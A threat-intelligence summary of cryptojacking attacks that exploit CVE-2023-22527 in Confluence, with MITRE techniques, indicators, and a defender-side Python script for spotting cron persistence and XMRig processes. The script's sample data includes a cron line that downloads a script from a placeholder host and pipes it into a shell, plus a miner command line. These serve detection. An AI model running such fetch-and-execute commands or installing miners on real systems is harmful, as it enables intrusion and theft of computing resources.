“Analyzing Cryptojacking through CVE-2023-22527: A Deep Dive into a Comprehensive Cryptomining Network”

The critical vulnerability CVE-2023-22527 in Confluence Data Center and Server is being exploited to turn affected systems into cryptomining networks, using shell scripts, SSH targeting, and cron-based persistence. Organizations are advised to update Confluence and adopt security best practices to defend against these cryptojacking campaigns. #CVE-2023-22527 #Confluence #cryptomining #XMRig #Atlassian

Keypoints

  • CVE-2023-22527 is a critical vulnerability with a CVSS score of 10.
  • Affects Confluence Data Center and Server versions 8.0.x to 8.5.3.
  • Threat actors exploit the vulnerability for cryptojacking activities.
  • Methods of exploitation include using XMRig miners and shell scripts.
  • Attackers kill competing cryptomining processes and maintain persistence through cron jobs.
  • Organizations should update Confluence and implement security best practices.
  • Regular patch management and security audits are recommended.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of CVE-2023-22527 for unauthorized access.
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Execution of shell scripts for cryptojacking.
  • [T1562.001] Disable or Modify Tools – Uninstalling security services to avoid detection.
  • [T1070.003] Clear Command History – Clearing logs and bash history to hide activities.
  • [T1070.002] Clear Linux or Mac System Logs – Removing system logs to cover tracks.
  • [T1105] Ingress Tool Transfer – Downloading mining tools and scripts to the compromised system.
  • [T1053.003] Scheduled Task/Job: Cron – Creating cron jobs to maintain persistence.
  • [T1005] Data from Local System – Gathering user information and SSH configurations for lateral movement.
  • [T1496] Resource Hijacking – Utilizing the victim’s resources for cryptomining activities.

Indicators of Compromise

  • [File name] – solr.sh, the mining configuration file, and other mining-related scripts (used to deploy and run miners on compromised systems)
  • [Process] – XMRig miner and related mining processes (used to perform cryptomining on infected hosts)
  • [SSH/Credential] – SSH configurations and keys found in local data (gathered for lateral movement via SSH)
  • [Wallet] – wallet addresses and related wallet information stored in a JSON file
  • [IP/Network] – local IP address and SSH endpoints used to spread to other hosts
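A defender-side sweep for the persistence and mining indicators listed in the keypoints, the technique list and the IoCs above, written as an added example that is not part of the Trend Micro report or of this summary. It scans a crontab dump and a process listing for the fetch-and-pipe-to-shell cron pattern, execution from temporary directories, the solr.sh file name, and XMRig-style process arguments. The sample crontab, process listing, pool host and wallet value are constructed placeholders; the TEST-NET address 203.0.113.10 and pool.example.invalid stand in for any real infrastructure.

```python
import re
from dataclasses import dataclass, field

# Constructed sample telemetry (not from the report): a crontab dump and a
# `ps -eo pid,user,args` listing from a hypothetical Confluence host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/5 * * * * curl -fsSL http://203.0.113.10/solr.sh | sh
0 2 * * * /usr/local/bin/backup-db.sh
@reboot /tmp/.x/solr.sh
"""

SAMPLE_PS = """\
  PID USER       COMMAND
 1042 confluence /opt/atlassian/confluence/jre/bin/java -Xms1024m -Dcatalina.base=/opt/atlassian/confluence
 2210 confluence /tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER --donate-level 1
 2300 root       /usr/sbin/sshd -D
"""


@dataclass
class Finding:
    source: str                      # "cron" or "process"
    subject: str                     # the offending cron line, or the PID
    reasons: list[str] = field(default_factory=list)


# Each rule pairs a human-readable reason with the regex that triggers it.
CRON_RULES = [
    ("fetches remote content and pipes it into a shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b")),
    ("runs a program from a world-writable temporary directory",
     re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/")),
    ("references the solr.sh dropper name seen in the campaign",
     re.compile(r"\bsolr\.sh\b")),
]

PROCESS_RULES = [
    ("executable name matches a known miner binary",
     re.compile(r"(^|/)xmrig(\s|$)")),
    ("connects to a stratum mining pool URL",
     re.compile(r"stratum\+(tcp|ssl)://")),
    ("uses XMRig-specific command-line options",
     re.compile(r"--donate-level\b")),
]


def scan_cron(lines):
    """Return one Finding per non-comment cron line that trips any CRON_RULES entry."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [name for name, rx in CRON_RULES if rx.search(line)]
        if reasons:
            findings.append(Finding("cron", line, reasons))
    return findings


def scan_processes(lines):
    """Return one Finding per `ps` row whose command line trips any PROCESS_RULES entry."""
    findings = []
    for raw in lines:
        parts = raw.split(maxsplit=2)          # pid, user, full command line
        if len(parts) < 3 or not parts[0].isdigit():
            continue                           # header row or malformed line
        pid, _user, args = parts
        reasons = [name for name, rx in PROCESS_RULES if rx.search(args)]
        if reasons:
            findings.append(Finding("process", pid, reasons))
    return findings


def sweep(crontab_text=SAMPLE_CRONTAB, ps_text=SAMPLE_PS):
    """Run both scanners and return the combined list of findings."""
    return scan_cron(crontab_text.splitlines()) + scan_processes(ps_text.splitlines())


if __name__ == "__main__":
    for f in sweep():
        print(f"[{f.source}] {f.subject}")
        for reason in f.reasons:
            print(f"    - {reason}")
```

Run it directly to print the findings for the embedded samples; on a live host, feed it the output of crontab -l for each account (plus the /etc/cron.d entries) and ps -eo pid,user,args. Keyword rules like these are a starting point rather than a signature: a renamed miner binary or an encoded launcher will slip past them, so pair the sweep with CPU-usage baselines and egress monitoring.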

Read more: https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html